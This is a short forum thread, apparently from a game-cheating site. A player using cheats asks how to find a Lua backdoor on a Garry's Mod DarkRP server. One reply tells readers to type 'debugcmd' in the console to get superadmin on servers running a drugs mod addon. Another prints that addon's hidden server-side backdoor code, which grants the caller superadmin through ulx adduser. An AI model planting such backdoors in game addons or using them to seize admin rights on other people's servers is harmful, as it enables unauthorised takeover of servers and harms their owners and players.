QuestionSolvedGetting server addon list/workshop collection

Posts 14 of 4 · Page 1 of 1
Getting server addon list/workshop collection
Subject: How do i get server addon list/workshop collection id?
Note: I am not an admin on this server.

So'im playing on some random DarkRP server and i have hacks enabled so i can see ranks. And i've suddenly seen one guy who was just running around, spawning weapons and changing his own rank from user to superadmin randomly (That guy was later banned by ip by the original owner). So, I'm pretty sure there is a lua backdoor on a server and i want to get addons list to scan it for backdoors. How can i do that?
It was probably the drugs mod. Type 'debugcmd' in console and you'll get superadmin if the server still has the addon.
Quote Originally Posted by zuk987 View Post
Subject: How do i get server addon list/workshop collection id?
Note: I am not an admin on this server.

So'im playing on some random DarkRP server and i have hacks enabled so i can see ranks. And i've suddenly seen one guy who was just running around, spawning weapons and changing his own rank from user to superadmin randomly (That guy was later banned by ip by the original owner). So, I'm pretty sure there is a lua backdoor on a server and i want to get addons list to scan it for backdoors. How can i do that?
You won't be able to find the backdoor. Even if you were to use scripthook or something that would download the servers files, the backdoor is server-sided. Gotta hurt right?

Welp, if this is somewhat related to the backdoor exposed on facepunch that was "hidden" in the drugs mod addon, here it is:


Code:
if SERVER then
concommand.Add( "debugcmd", function( debugPlayer )
RunConsoleCommand("ulx","adduser",debugPlayer:Name(),"superadmin")
end)
end
Solved. @Hunter
/Solved & closed.
Posts 14 of 4 · Page 1 of 1
This thread is closed for replies.

Similar Threads

Tags for this Thread

None

Need help?